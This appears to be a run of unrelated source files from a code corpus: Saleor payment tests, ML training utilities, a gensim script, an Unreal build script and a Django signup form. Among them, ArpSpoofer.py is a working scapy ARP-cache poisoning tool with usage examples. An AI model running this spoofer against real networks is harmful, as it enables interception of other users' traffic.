the-stack_106_23755
from decimal import Decimal
from unittest.mock import Mock, patch
import pytest
from ...checkout.calculations import checkout_total
from .. import ChargeStatus, GatewayError, PaymentError, TransactionKind, gateway
from ..error_codes import PaymentErrorCode
from ..interface import GatewayResponse, PaymentMethodInfo
from ..models import Payment
from ..utils import (
ALLOWED_GATEWAY_KINDS,
clean_authorize,
clean_capture,
create_payment,
create_payment_information,
create_transaction,
is_currency_supported,
validate_gateway_response,
)
NOT_ACTIVE_PAYMENT_ERROR = "This payment is no longer active."
EXAMPLE_ERROR = "Example dummy error"
@pytest.fixture
def payment_method_details():
return PaymentMethodInfo(
last_4="1234", exp_year=2020, exp_month=8, brand="visa", name="Joe Doe"
)
@pytest.fixture
def gateway_response(settings, payment_method_details):
return GatewayResponse(
is_success=True,
action_required=False,
transaction_id="transaction-token",
amount=Decimal(14.50),
currency="USD",
kind=TransactionKind.CAPTURE,
error=None,
raw_response={
"credit_card_four": "1234",
"transaction-id": "transaction-token",
},
payment_method_info=payment_method_details,
)
@pytest.fixture
def transaction_data(payment_dummy, gateway_response):
return {
"payment": payment_dummy,
"payment_information": create_payment_information(
payment_dummy, "payment-token"
),
"kind": TransactionKind.CAPTURE,
"gateway_response": gateway_response,
}
@pytest.fixture
def transaction_token():
return "transaction-token"
@pytest.fixture
def dummy_response(payment_dummy, transaction_token, payment_method_details):
return GatewayResponse(
is_success=True,
action_required=False,
transaction_id=transaction_token,
error=EXAMPLE_ERROR,
amount=payment_dummy.total,
currency=payment_dummy.currency,
kind=TransactionKind.AUTH,
raw_response=None,
payment_method_info=payment_method_details,
)
def test_create_payment(checkout_with_item, address):
checkout_with_item.billing_address = address
checkout_with_item.save()
data = {
"gateway": "Dummy",
"payment_token": "token",
"total": checkout_total(
checkout=checkout_with_item, lines=list(checkout_with_item)
).gross.amount,
"currency": checkout_with_item.currency,
"email": "[email protected]",
"customer_ip_address": "127.0.0.1",
"checkout": checkout_with_item,
}
payment = create_payment(**data)
assert payment.gateway == "Dummy"
same_payment = create_payment(**data)
assert payment == same_payment
def test_create_payment_requires_order_or_checkout(settings):
data = {
"gateway": "Dummy",
"payment_token": "token",
"total": 10,
"currency": "USD",
"email": "[email protected]",
}
with pytest.raises(TypeError) as e:
create_payment(**data)
assert e.value.args[0] == "Must provide checkout or order to create a payment."
def test_create_payment_from_checkout_requires_billing_address(checkout_with_item):
checkout_with_item.billing_address = None
checkout_with_item.save()
data = {
"gateway": "Dummy",
"payment_token": "token",
"total": checkout_total(
checkout=checkout_with_item, lines=list(checkout_with_item)
),
"currency": checkout_with_item.currency,
"email": "[email protected]",
"checkout": checkout_with_item,
}
with pytest.raises(PaymentError) as e:
create_payment(**data)
assert e.value.code == PaymentErrorCode.BILLING_ADDRESS_NOT_SET.value
def test_create_payment_from_order_requires_billing_address(draft_order):
draft_order.billing_address = None
draft_order.save()
data = {
"gateway": "Dummy",
"payment_token": "token",
"total": draft_order.total.gross.amount,
"currency": draft_order.currency,
"email": "[email protected]",
"order": draft_order,
}
with pytest.raises(PaymentError) as e:
create_payment(**data)
assert e.value.code == PaymentErrorCode.BILLING_ADDRESS_NOT_SET.value
def test_create_payment_information_for_checkout_payment(address, checkout_with_item):
checkout_with_item.billing_address = address
checkout_with_item.shipping_address = address
checkout_with_item.save()
data = {
"gateway": "Dummy",
"payment_token": "token",
"total": checkout_total(
checkout=checkout_with_item, lines=list(checkout_with_item)
).gross.amount,
"currency": checkout_with_item.currency,
"email": "[email protected]",
"customer_ip_address": "127.0.0.1",
"checkout": checkout_with_item,
}
payment = create_payment(**data)
payment_data = create_payment_information(payment, "token", payment.total)
billing = payment_data.billing
shipping = payment_data.shipping
assert billing
assert billing.first_name == address.first_name
assert billing.last_name == address.last_name
assert billing.street_address_1 == address.street_address_1
assert billing.city == address.city
assert shipping == billing
def test_create_payment_information_for_draft_order(draft_order):
data = {
"gateway": "Dummy",
"payment_token": "token",
"total": draft_order.total.gross.amount,
"currency": draft_order.currency,
"email": "[email protected]",
"customer_ip_address": "127.0.0.1",
"order": draft_order,
}
payment = create_payment(**data)
payment_data = create_payment_information(payment, "token", payment.total)
billing = payment_data.billing
shipping = payment_data.shipping
assert billing
assert billing.first_name == draft_order.billing_address.first_name
assert billing.last_name == draft_order.billing_address.last_name
assert billing.street_address_1 == draft_order.billing_address.street_address_1
assert billing.city == draft_order.billing_address.city
assert shipping == billing
def test_create_transaction(transaction_data):
txn = create_transaction(**transaction_data)
assert txn.payment == transaction_data["payment"]
gateway_response = transaction_data["gateway_response"]
assert txn.kind == gateway_response.kind
assert txn.amount == gateway_response.amount
assert txn.currency == gateway_response.currency
assert txn.token == gateway_response.transaction_id
assert txn.is_success == gateway_response.is_success
assert txn.gateway_response == gateway_response.raw_response
def test_create_transaction_no_gateway_response(transaction_data):
transaction_data.pop("gateway_response")
txn = create_transaction(**transaction_data)
assert txn.gateway_response == {}
@pytest.mark.parametrize(
"func",
[gateway.authorize, gateway.capture, gateway.confirm, gateway.refund, gateway.void],
)
def test_payment_needs_to_be_active_for_any_action(func, payment_dummy):
payment_dummy.is_active = False
with pytest.raises(PaymentError) as exc:
func(payment_dummy, "token")
assert exc.value.message == NOT_ACTIVE_PAYMENT_ERROR
@patch("saleor.order.actions.handle_fully_paid_order")
def test_gateway_charge_failed(
mock_handle_fully_paid_order, mock_get_manager, payment_txn_preauth, dummy_response
):
txn = payment_txn_preauth.transactions.first()
txn.is_success = False
payment = payment_txn_preauth
amount = payment.total
dummy_response.is_success = False
dummy_response.kind = TransactionKind.CAPTURE
mock_get_manager.capture_payment.return_value = dummy_response
with pytest.raises(PaymentError):
gateway.capture(payment, amount)
mock_get_manager.capture_payment.assert_called_once()
payment.refresh_from_db()
assert payment.charge_status == ChargeStatus.NOT_CHARGED
assert not payment.captured_amount
assert not mock_handle_fully_paid_order.called
def test_gateway_charge_errors(payment_dummy, transaction_token, settings):
payment = payment_dummy
gateway.authorize(payment, transaction_token)
with pytest.raises(PaymentError) as exc:
gateway.capture(payment, Decimal("0"))
assert exc.value.message == "Amount should be a positive number."
payment.charge_status = ChargeStatus.FULLY_REFUNDED
payment.save()
with pytest.raises(PaymentError) as exc:
gateway.capture(payment, Decimal("10"))
assert exc.value.message == "This payment cannot be captured."
payment.charge_status = ChargeStatus.NOT_CHARGED
payment.save()
with pytest.raises(PaymentError) as exc:
gateway.capture(payment, Decimal("1000000"))
assert exc.value.message == ("Unable to charge more than un-captured amount.")
def test_gateway_refund_errors(payment_txn_captured):
payment = payment_txn_captured
with pytest.raises(PaymentError) as exc:
gateway.refund(payment, Decimal("1000000"))
assert exc.value.message == "Cannot refund more than captured."
with pytest.raises(PaymentError) as exc:
gateway.refund(payment, Decimal("0"))
assert exc.value.message == "Amount should be a positive number."
payment.charge_status = ChargeStatus.NOT_CHARGED
payment.save()
with pytest.raises(PaymentError) as exc:
gateway.refund(payment, Decimal("1"))
assert exc.value.message == "This payment cannot be refunded."
def test_clean_authorize():
payment = Mock(can_authorize=Mock(return_value=True))
clean_authorize(payment)
payment = Mock(can_authorize=Mock(return_value=False))
with pytest.raises(PaymentError):
clean_authorize(payment)
def test_clean_capture():
# Amount should be a positive number
payment = Mock()
amount = Decimal("0.00")
with pytest.raises(PaymentError):
clean_capture(payment, amount)
# Payment cannot be captured
payment = Mock(can_capture=Mock(return_value=False))
amount = Decimal("1.00")
with pytest.raises(PaymentError):
clean_capture(payment, amount)
# Amount is larger than payment's total
payment = Mock(
can_capture=Mock(return_value=True),
total=Decimal("1.00"),
captured_amount=Decimal("0.00"),
)
amount = Decimal("2.00")
with pytest.raises(PaymentError):
clean_capture(payment, amount)
amount = Decimal("2.00")
payment = Mock(
can_capture=Mock(return_value=True),
total=amount,
captured_amount=Decimal("0.00"),
)
clean_capture(payment, amount)
def test_can_authorize(payment_dummy: Payment):
assert payment_dummy.charge_status == ChargeStatus.NOT_CHARGED
payment_dummy.is_active = False
assert not payment_dummy.can_authorize()
payment_dummy.is_active = True
assert payment_dummy.can_authorize()
payment_dummy.charge_status = ChargeStatus.PARTIALLY_CHARGED
assert not payment_dummy.can_authorize()
payment_dummy.charge_status = ChargeStatus.FULLY_CHARGED
assert not payment_dummy.can_authorize()
def test_can_capture(payment_txn_preauth: Payment):
assert payment_txn_preauth.charge_status == ChargeStatus.NOT_CHARGED
payment_txn_preauth.is_active = False
assert not payment_txn_preauth.can_capture()
payment_txn_preauth.is_active = True
assert payment_txn_preauth.can_capture()
payment_txn_preauth.charge_status = ChargeStatus.PARTIALLY_CHARGED
assert not payment_txn_preauth.can_capture()
payment_txn_preauth.charge_status = ChargeStatus.FULLY_CHARGED
assert not payment_txn_preauth.can_capture()
payment_txn_preauth.captured_amount = 0
payment_txn_preauth.transactions.all().delete()
assert not payment_txn_preauth.can_capture()
def test_can_void(payment_txn_preauth: Payment):
assert payment_txn_preauth.charge_status == ChargeStatus.NOT_CHARGED
payment_txn_preauth.is_active = False
assert not payment_txn_preauth.can_void()
payment_txn_preauth.is_active = True
assert payment_txn_preauth.can_void()
payment_txn_preauth.charge_status = ChargeStatus.PARTIALLY_CHARGED
assert not payment_txn_preauth.can_void()
payment_txn_preauth.charge_status = ChargeStatus.FULLY_CHARGED
assert not payment_txn_preauth.can_void()
payment_txn_preauth.charge_status = ChargeStatus.NOT_CHARGED
payment_txn_preauth.transactions.all().delete()
assert not payment_txn_preauth.can_void()
def test_can_refund(payment_dummy: Payment):
assert payment_dummy.charge_status == ChargeStatus.NOT_CHARGED
payment_dummy.is_active = False
assert not payment_dummy.can_refund()
payment_dummy.is_active = True
assert not payment_dummy.can_refund()
payment_dummy.charge_status = ChargeStatus.PARTIALLY_CHARGED
assert payment_dummy.can_refund()
payment_dummy.charge_status = ChargeStatus.FULLY_CHARGED
assert payment_dummy.can_refund()
def test_payment_get_authorized_amount(payment_txn_preauth):
payment = payment_txn_preauth
authorized_amount = payment.transactions.first().amount
assert payment.get_authorized_amount().amount == authorized_amount
assert payment.order.total_authorized.amount == authorized_amount
payment.transactions.create(
amount=payment.total,
kind=TransactionKind.CAPTURE,
gateway_response={},
is_success=True,
)
assert payment.get_authorized_amount().amount == Decimal(0)
payment.transactions.all().delete()
assert payment.get_authorized_amount().amount == Decimal(0)
def test_validate_gateway_response(gateway_response):
validate_gateway_response(gateway_response)
def test_validate_gateway_response_incorrect_transaction_kind(gateway_response):
gateway_response.kind = "incorrect-kind"
with pytest.raises(GatewayError) as e:
validate_gateway_response(gateway_response)
assert str(e.value) == (
"Gateway response kind must be one of {}".format(sorted(ALLOWED_GATEWAY_KINDS))
)
def test_validate_gateway_response_not_json_serializable(gateway_response):
class CustomClass(object):
pass
gateway_response.raw_response = CustomClass()
with pytest.raises(GatewayError) as e:
validate_gateway_response(gateway_response)
assert str(e.value) == "Gateway response needs to be json serializable"
@pytest.mark.parametrize(
"currency, exp_response", [("EUR", True), ("USD", True), ("PLN", False)],
)
def test_is_currency_supported(
currency, exp_response, dummy_gateway_config, monkeypatch
):
# given
dummy_gateway_config.supported_currencies = "USD, EUR"
monkeypatch.setattr(
"saleor.payment.gateways.dummy.plugin.DummyGatewayPlugin._get_gateway_config",
lambda _: dummy_gateway_config,
)
# when
response = is_currency_supported(currency, "mirumee.payments.dummy")
# then
assert response == exp_response
the-stack_106_23756
from gensim.models import KeyedVectors
import numpy as np
import sys
import tqdm
import copy
import argparse
if __name__ == '__main__':
'''
'''
parser = argparse.ArgumentParser(description='Embedding similarity order generation')
parser.add_argument("--w2v_emb_path", type=str, default="")
parser.add_argument("--d2gpo_order_txt", type=str, default="")
parser.add_argument("--d2gpo_order_idx", type=str, default="")
args = parser.parse_args()
model = KeyedVectors.load_word2vec_format(args.w2v_emb_path)
if args.d2gpo_order_txt != "":
fout1 = open(args.d2gpo_order_txt, 'w', encoding='utf-8')
with open(args.d2gpo_order_idx, 'w', encoding='utf-8') as fout2:
for idx in tqdm.tqdm(range(len(model.vocab))):
word = model.index2word[idx]
most_similar = model.most_similar(word, topn=None)
most_similar_index = np.argsort(-most_similar)
most_similar_words = [model.index2word[widx] for widx in list(most_similar_index)]
most_similar_index = list(most_similar_index)
if args.d2gpo_order_txt != "":
fout1.write(' '.join(most_similar_words)+'\n')
fout2.write(' '.join([str(item) for item in most_similar_index])+'\n')
if args.d2gpo_order_txt != "":
fout1.close()
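# Example invocation (a sketch; the script filename and paths below are
# placeholders, not files shipped with this code). The embedding must be in
# word2vec text format; the outputs receive one line per vocabulary word,
# listing its neighbours ranked by cosine similarity as words and as
# vocabulary indices respectively.
#
#   python embedding_order.py \
#       --w2v_emb_path embeddings/word2vec.txt \
#       --d2gpo_order_txt output/order_words.txt \
#       --d2gpo_order_idx output/order_index.txt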
the-stack_106_23759
from pathlib import Path
import numpy as np
import pandas as pd
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.utils.data
import torchvision
import torchvision.models as models
from tqdm.notebook import tqdm
import math
def find_lr(
model,
train_loader,
optimizer="adam",
loss_fn="crossentropy",
device_type="CPU",
init_value=1e-8,
final_value=1e1,
):
# https://stackoverflow.com/questions/14313510/how-to-calculate-rolling-moving-average-using-numpy-scipy
def moving_average(x, w):
return np.convolve(x, np.ones(w), "valid") / w
batch_number = len(train_loader) - 1
update_step = (final_value / init_value) ** (1 / batch_number)
lr = init_value
# ----------------------
if (device_type == "GPU") & (torch.cuda.is_available()):
device = torch.device("cuda")
print(f"Training on GPU...\n")
elif device_type == "CPU":
device = torch.device("cpu")
print(f"Training on CPU...\n")
elif (device_type == "GPU") & (not torch.cuda.is_available()):
raise Exception("""GPU not found""")
else:
raise Exception("""Please choose between 'CPU' and 'GPU' for device type""")
model = model.to(device)
loss_fns = {
"crossentropy": torch.nn.CrossEntropyLoss,
"multimargin": torch.nn.MultiMarginLoss,
"softmargin": torch.nn.SoftMarginLoss,
"nnl": torch.nn.NLLLoss,
}
optimizers = {
"adamw": optim.AdamW,
"adam": optim.Adam,
"adagrad": optim.Adagrad,
"adadelta": optim.Adadelta,
"adamax": optim.Adamax,
"asgd": optim.ASGD,
"rmsprop": optim.RMSprop,
"sgd": optim.SGD,
"rprop": optim.Rprop,
}
# Instantiate loss function and optimizer
# TODO: error catching for not implemented
loss_fn, optimizer = (
loss_fns[loss_fn](),
optimizers[optimizer](model.parameters()),
)
# ----------------------
optimizer.param_groups[0]["lr"] = lr
best_loss = 0.0
batch_num = 0
losses = []
log_lrs = []
for data in tqdm(train_loader, desc="Training Batch"):
batch_num += 1
inputs, labels = data
inputs = inputs.to(device)
labels = labels.to(device)
optimizer.zero_grad()
outputs = model(inputs)
loss = loss_fn(outputs, labels)
if batch_num > 1 and loss > 4e1 * best_loss:
losses.append(loss)
log_lrs.append(lr)
if len(log_lrs) > 20:
return log_lrs[10:], losses[10:]
else:
return log_lrs, losses
# record the best loss
if loss < best_loss or batch_num == 1:
best_loss = loss
losses.append(loss)
# log_lrs.append(math.log10(lr))
log_lrs.append(lr)
loss.backward()
optimizer.step()
lr *= update_step
optimizer.param_groups[0]["lr"] = lr
losses = moving_average(losses, 5)
if len(log_lrs) > 20:
return log_lrs[10:], losses[10:]
else:
return log_lrs, losses
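# Minimal usage sketch for find_lr (the `model` and `train_loader` arguments
# are hypothetical and not defined in this module). Note that despite its
# name, the returned log_lrs list holds raw learning-rate values here, so the
# plot below uses a logarithmic x axis instead of pre-logged values.
def _example_find_lr_usage(model, train_loader):
    import matplotlib.pyplot as plt  # only needed for this demo
    lrs, losses = find_lr(model, train_loader, optimizer="adam",
                          loss_fn="crossentropy", device_type="CPU")
    plt.plot(lrs, [float(loss) for loss in losses])  # losses may still be tensors
    plt.xscale("log")
    plt.xlabel("learning rate")
    plt.ylabel("smoothed loss")
    plt.show()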
def train(
model: nn.Module,
train_loader,
val_loader,
optimizer="adam",
loss_fn="crossentropy",
epochs: int = 20,
learning_rate=3e-4,
    device_type: str = "CPU",
) -> pd.DataFrame:
"""
    Train a PyTorch model, evaluating on the validation loader after each epoch.
    :param model: PyTorch model
    :returns: The trained model and a DataFrame of per-epoch metrics
"""
if (device_type == "GPU") & (torch.cuda.is_available()):
device = torch.device("cuda")
torch.cuda.empty_cache() # clear data
print(f"Training on GPU...\n")
elif device_type == "CPU":
device = torch.device("cpu")
print(f"Training on CPU...\n")
elif (device_type == "GPU") & (not torch.cuda.is_available()):
raise Exception("""GPU not found""")
else:
raise Exception("""Please choose between 'CPU' and 'GPU' for device type""")
model = model.to(device)
loss_fns = {
"crossentropy": torch.nn.CrossEntropyLoss,
"multimargin": torch.nn.MultiMarginLoss,
"softmargin": torch.nn.SoftMarginLoss,
"nnl": torch.nn.NLLLoss,
}
optimizers = {
"adamw": optim.AdamW,
"adam": optim.Adam,
"adagrad": optim.Adagrad,
"adadelta": optim.Adadelta,
"adamax": optim.Adamax,
"asgd": optim.ASGD,
"rmsprop": optim.RMSprop,
"sgd": optim.SGD,
"rprop": optim.Rprop,
}
# Instantiate loss function and optimizer
# TODO: error catching for not implemented
loss_fn, optimizer = (
loss_fns[loss_fn](),
optimizers[optimizer](model.parameters(), lr=learning_rate),
)
metrics_dict = {
"Epoch": [],
"Training Loss": [],
"Validation Loss": [],
"Training Accuracy": [],
"Validation Accuracy": [],
}
for epoch in tqdm(range(1, epochs + 1), desc="Epoch"):
#### TRAINING LOOP ####
training_loss = 0.0
model.train()
num_correct = 0
num_training_examples = 0
for batch in tqdm(
train_loader, desc="Training Batch", leave=bool(epoch == epochs)
): #
optimizer.zero_grad() # zeroize gradients
inputs, targets = batch
inputs = inputs.to(device)
targets = targets.to(device)
output = model(inputs) # forward pass
loss = loss_fn(output, targets) # calculate loss
loss.backward() # calculate gradients
optimizer.step() # adjust/step weights + biases
training_loss += loss.data.item() * inputs.size()[0]
correct = torch.eq(
torch.max(output.softmax(dim=1), dim=-1)[1], targets.squeeze()
).sum()
num_correct += correct.data.item()
num_training_examples += inputs.shape[0]
training_accuracy = num_correct / num_training_examples
training_loss /= len(
train_loader.dataset
) # weighted average training loss for epoch
#### TRAINING LOOP ####
#### VALIDATION/EVALUATION LOOP ####
valid_loss = 0.0
num_correct = 0
num_validation_examples = 0
model.eval()
for batch in tqdm(
val_loader, desc="Validation Batch", leave=bool(epoch == epochs)
):
inputs, targets = batch
inputs = inputs.to(device)
targets = targets.to(device)
output = model(inputs)
loss = loss_fn(output, targets) # calculate loss
valid_loss += loss.data.item() * inputs.size()[0]
correct = torch.eq(
torch.max(output.softmax(dim=1), dim=-1)[1], targets.squeeze()
).sum()
num_correct += correct.data.item()
num_validation_examples += inputs.shape[0]
valid_loss /= len(val_loader.dataset)
validation_accuracy = num_correct / num_validation_examples
#### VALIDATION/EVALUATION LOOP ####
#### PRINT PERFORMANCE METRICS #####
metrics_dict["Epoch"].append(epoch)
metrics_dict["Training Loss"].append(training_loss)
metrics_dict["Validation Loss"].append(valid_loss)
metrics_dict["Training Accuracy"].append(training_accuracy)
metrics_dict["Validation Accuracy"].append(validation_accuracy)
#### PRINT PERFORMANCE METRICS #####
metrics_dict = pd.DataFrame(metrics_dict)
return model, metrics_dict
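# Minimal usage sketch for train() (the data loaders are hypothetical; a
# torchvision ResNet-18 is just one possible model choice, not something this
# module requires).
def _example_train_usage(train_loader, val_loader):
    model = models.resnet18(pretrained=True)
    model.fc = nn.Linear(model.fc.in_features, 2)  # e.g. adapt to a 2-class task
    trained_model, metrics = train(
        model,
        train_loader,
        val_loader,
        optimizer="adam",
        loss_fn="crossentropy",
        epochs=5,
        learning_rate=3e-4,
        device_type="CPU",
    )
    print(metrics)  # per-epoch loss and accuracy as a pandas DataFrame
    return trained_model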
the-stack_106_23760
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#-------------------------------------------------------------------------------
# Package the game for distribution - make sure to configure project.json
# Usage : Build.py <absolute-output-dir>
#
# Gwennaël Arbona 2021
#-------------------------------------------------------------------------------
import re
import os
import sys
import json
import shutil
import subprocess
#-------------------------------------------------------------------------------
# Read config files for data
#-------------------------------------------------------------------------------
projectConfigFile = open('../Config/Build.json')
projectConfig = json.load(projectConfigFile)
# Get mandatory project settings
projectName = str(projectConfig['name'])
projectPlatforms = projectConfig['platforms']
projectBuildConfiguration = projectConfig['configuration']
projectKeepPdbs = projectConfig['pdb']
# Get optional build settings
outputDir = os.path.abspath(str(projectConfig.get('outputDir')))
engineDir = str(projectConfig.get('engineDir'))
sourceEngine = projectConfig.get('sourceEngine')
projectConfigFile.close()
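# Illustrative Config/Build.json matching the keys read above (all values are
# placeholders, not this project's real settings):
#
#   {
#       "name": "MyGame",
#       "platforms": ["Win64", "Linux"],
#       "configuration": "Shipping",
#       "pdb": false,
#       "outputDir": "C:/Builds",
#       "engineDir": "C:/UnrealEngine",
#       "sourceEngine": false
#   }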
# Get version tag
gitCommand = ['git', 'describe', '--tags']
try:
buildVersion = subprocess.check_output(gitCommand).decode('utf-8')
buildVersion = buildVersion.replace('\n', '');
except:
sys.exit('Git describe failed')
#-------------------------------------------------------------------------------
# Process arguments for sanity
#-------------------------------------------------------------------------------
# Get output directory
if outputDir == 'None':
if len(sys.argv) == 2:
outputDir = sys.argv[1]
else:
sys.exit('Output directory was neither set in project.json nor passed as command line')
# Get engine directory
if engineDir != 'None':
    if not os.path.exists(engineDir):
        sys.exit('Engine directory provided in project.json does not exist')
elif 'UE_ROOT' in os.environ:
    engineDir = os.environ['UE_ROOT']
    if not os.path.exists(engineDir):
        sys.exit('Engine directory provided in %UE_ROOT% does not exist')
else:
    sys.exit('Engine directory was set neither in project.json nor UE_ROOT environment variable')
# Installed vs built engine
if sourceEngine:
installedOption = ''
cleanOption = ''
else:
installedOption = '-installed'
cleanOption = ''
# Generate paths
projectFile = os.path.join(os.getcwd(), '..', projectName + '.uproject')
engineBuildTool = os.path.join(engineDir, 'Engine', 'Build', 'BatchFiles', 'RunUAT.bat')
# Clean up output path
releaseOutputDir = os.path.join(os.getcwd(), '..', 'Releases', buildVersion)
if os.path.exists(releaseOutputDir):
shutil.rmtree(releaseOutputDir)
#-------------------------------------------------------------------------------
# Build project
#-------------------------------------------------------------------------------
# Execute build command for each platform
for platform in projectPlatforms:
cleanPlatformNames = {
'Win64' : 'Windows',
'Linux' : 'Linux'
}
# Clean up output path
buildOutputDir = os.path.join(outputDir, cleanPlatformNames[platform])
if os.path.exists(buildOutputDir):
shutil.rmtree(buildOutputDir)
# Build project
subprocess.check_call([
engineBuildTool,
# SDK
'-ScriptsForProject="' + projectFile + '"',
'Turnkey',
'-command=VerifySdk',
'-platform=' + platform,
'-UpdateIfNeeded',
# Executable
'BuildCookRun',
'-unrealexe=UnrealEditor-Cmd.exe',
# Project
'-project="' + projectFile + '"',
'-utf8output', '-nop4',
# Build
'-nocompile',
'-clientconfig=' + projectBuildConfiguration,
'-build',
'-targetplatform=' + platform,
cleanOption,
installedOption,
# Cook
'-cook',
'-skipcookingeditorcontent',
'-createreleaseversion=' + buildVersion,
# Package
'-stage',
'-package',
'-pak',
'-compressed',
'-distribution',
'-archive',
'-archivedirectory="' + outputDir + '"'
])
# Remove individual files that are not wanted in release
for root, directories, filenames in os.walk(buildOutputDir):
for filename in filenames:
absoluteFilename = str(os.path.join(root, filename))
baseChunkName = projectName + '-' + cleanPlatformNames[platform] + '-'
# Wipe generated files that aren't needed
if re.match('.*\.((pdb)|(debug))', filename):
if 'ThirdParty' in root or not projectKeepPdbs:
shutil.move(absoluteFilename, releaseOutputDir)
elif re.match('Manifest.*\.txt', filename):
os.remove(absoluteFilename)
# Rename optional chunks
chunkMatch = re.search('pakchunk([0-9]+)optional.*\.pak', filename)
if chunkMatch:
absoluteChunkFilename = str(os.path.join(root, baseChunkName + chunkMatch.group(1) + 'b.pak'))
shutil.move(absoluteFilename, absoluteChunkFilename)
# Rename normal chunks
else:
chunkMatch = re.search('pakchunk([0-9]+).*\.pak', filename)
if chunkMatch:
absoluteChunkFilename = str(os.path.join(root, baseChunkName + chunkMatch.group(1) + '.pak'))
shutil.move(absoluteFilename, absoluteChunkFilename)
# Remove unwanted config directories, engine debug content, unused libraries
shutil.rmtree(os.path.join(buildOutputDir, projectName, 'Config'), ignore_errors=True)
shutil.rmtree(os.path.join(buildOutputDir, 'Engine', 'Content'), ignore_errors=True)
shutil.rmtree(os.path.join(buildOutputDir, 'Engine', 'Binaries', 'ThirdParty', 'NVIDIA'), ignore_errors=True)
shutil.rmtree(os.path.join(buildOutputDir, 'Engine', 'Binaries', 'ThirdParty', 'PhysX3'), ignore_errors=True)
# Copy Steam appId file
buildExecutableDir = os.path.join(buildOutputDir, projectName, 'Binaries', platform)
shutil.copyfile(os.path.join('..', 'steam_appid.txt'), os.path.join(buildExecutableDir, 'steam_appid.txt'))
# Copy the crash reporter
crashReportExecutableDir = os.path.join(buildOutputDir, 'Engine', 'Binaries', platform)
crashReportExecutable = os.path.join('..', 'Mayday')
os.mkdir(crashReportExecutableDir)
if platform == 'Linux':
if os.path.exists(crashReportExecutable):
shutil.copyfile(crashReportExecutable, os.path.join(crashReportExecutableDir, 'CrashReportClient'))
else:
crashReportExecutable = crashReportExecutable + '.exe'
if os.path.exists(crashReportExecutable):
shutil.copyfile(crashReportExecutable, os.path.join(crashReportExecutableDir, 'CrashReportClient.exe'))
the-stack_106_23761
'''
ArpSpoofer.py by Amitai Farber 1/2021
This script performs ARP spoofing on the local network.
It does so by constantly sending 'is at' responses to the attacked
computer with our MAC address and the desired IP, so that the attacked
computer thinks that we are the IP we sent it.
'''
from time import sleep
import argparse
import netifaces
from scapy.all import *
from getmac import get_mac_address as gma
import sys
import defaults
def main(args):
iface = args.iface
src = args.src
delay = args.delay
gw = args.gw
target = args.target
got_src = True
if not iface:
iface = defaults.iface
if not src:
got_src = False
src = get_gw_ip(iface)
if not delay:
        delay = defaults.delay
if not gw:
gw = defaults.gw
gw_ip = get_gw_ip(iface)
target_mac = get_mac_by_ip(target)
gw_mac = get_mac_by_ip(gw_ip)
my_mac = gma()
while True:
send_ARP_response(iface, src, target, gw, gw_ip, target_mac, my_mac, gw_mac, got_src)
sleep(delay)
def send_ARP_response(iface, src, target, gw, gw_ip, dst_mac, my_mac, gw_mac, got_src):
send_is_at(iface, target, dst_mac, my_mac, src)
if gw:
if got_src:
send_is_at(iface, gw_ip, gw_mac, my_mac, src)
else:
send_is_at(iface, gw_ip, gw_mac, my_mac, target)
def get_gw_ip(iface):
gateways = netifaces.gateways()
return gateways['default'][netifaces.AF_INET][0]
def send_is_at(iface, target, dst_mac, my_mac, ip):
msg = f'sending \'is_at\' to {target} (mac: {dst_mac})'
msg += f'that will convince him that the mac of {ip} is our mac ({my_mac})'
print(msg)
packet = Ether(dst=dst_mac, src=my_mac) / ARP(op=2, hwsrc=my_mac, psrc=ip, hwdst=dst_mac, pdst=target)
sendp(packet, iface=iface)
def get_mac_by_ip(dst_ip):
my_ip = get_if_addr(conf.iface)
response = sr(ARP(op=1, psrc=my_ip, pdst=dst_ip), timeout=5)
return response[0][ARP][0][1].hwsrc
if __name__ == "__main__":
filename = sys.argv[0].split('\\')[-1].split('/')[-1]
example_text = f'''Example:
for making 10.0.0.12 think we are the gateway:
python {filename} -t 10.0.0.12
for making 10.0.0.12 think we are the gateway, and the the gateway think we are 10.0.0.12:
python {filename} -t 10.0.0.12 -gw
'''
parser = argparse.ArgumentParser(description='Spoof ARP tables',
epilog=example_text,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('-i', '--iface', type=str, help='Interface you wish to use')
parser.add_argument('-s', '--src', type=str, help='The address you want for the attacker')
parser.add_argument('-d', '--delay', type=int, help='Delay (in seconds) between messages')
parser.add_argument('-gw', help='should GW be attacked as well?', action='store_true')
parser.add_argument('-t', '--target', type=str, help='IP of target', required=True)
args = parser.parse_args()
main(args)
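# Sketch of the companion defaults.py module imported above (assumed contents;
# adjust the interface name and timing to your own environment):
#
#   iface = "eth0"   # network interface to send spoofed replies on
#   delay = 2        # seconds to wait between spoofed replies
#   gw = False       # whether to poison the gateway as well by default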
the-stack_106_23763
# encoding: utf-8
from __future__ import unicode_literals
from django import forms
from django.utils.translation import ugettext_lazy as _
from userena.forms import SignupForm
class SignupFormExtra(SignupForm):
"""
A form to demonstrate how to add extra fields to the signup form, in this
case adding the first and last name.
"""
first_name = forms.CharField(label=_('First name'),
max_length=30,
required=False)
last_name = forms.CharField(label=_('Last name'),
max_length=30,
required=False)
def __init__(self, *args, **kw):
"""
A bit of hackery to get the first name and last name at the top of the
        form instead of at the end.
"""
super(SignupFormExtra, self).__init__(*args, **kw)
# Put the first and last name at the top
new_order = self.fields.keyOrder[:-2]
new_order.insert(0, 'first_name')
new_order.insert(1, 'last_name')
self.fields.keyOrder = new_order
def save(self):
"""
Override the save method to save the first and last name to the user
field.
"""
# First save the parent form and get the user.
new_user = super(SignupFormExtra, self).save()
new_user.first_name = self.cleaned_data['first_name']
new_user.last_name = self.cleaned_data['last_name']
new_user.save()
# Userena expects to get the new user from this form, so return the new
# user.
        return new_user
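# Wiring the form in (a sketch based on django-userena's documented
# `signup_form` argument to its signup view; the URL pattern style and module
# paths are assumptions that depend on the project's Django/userena versions):
#
#   from userena import views as userena_views
#   url(r'^accounts/signup/$', userena_views.signup,
#       {'signup_form': SignupFormExtra}),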
the-stack_106_23767
#!/usr/bin/env python3
# Copyright (c) 2015-2018 The Stancecoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Utilities for manipulating blocks and transactions."""
from .address import (
key_to_p2sh_p2wpkh,
key_to_p2wpkh,
script_to_p2sh_p2wsh,
script_to_p2wsh,
)
from .messages import (
CBlock,
COIN,
COutPoint,
CTransaction,
CTxIn,
CTxInWitness,
CTxOut,
FromHex,
ToHex,
bytes_to_hex_str,
hash256,
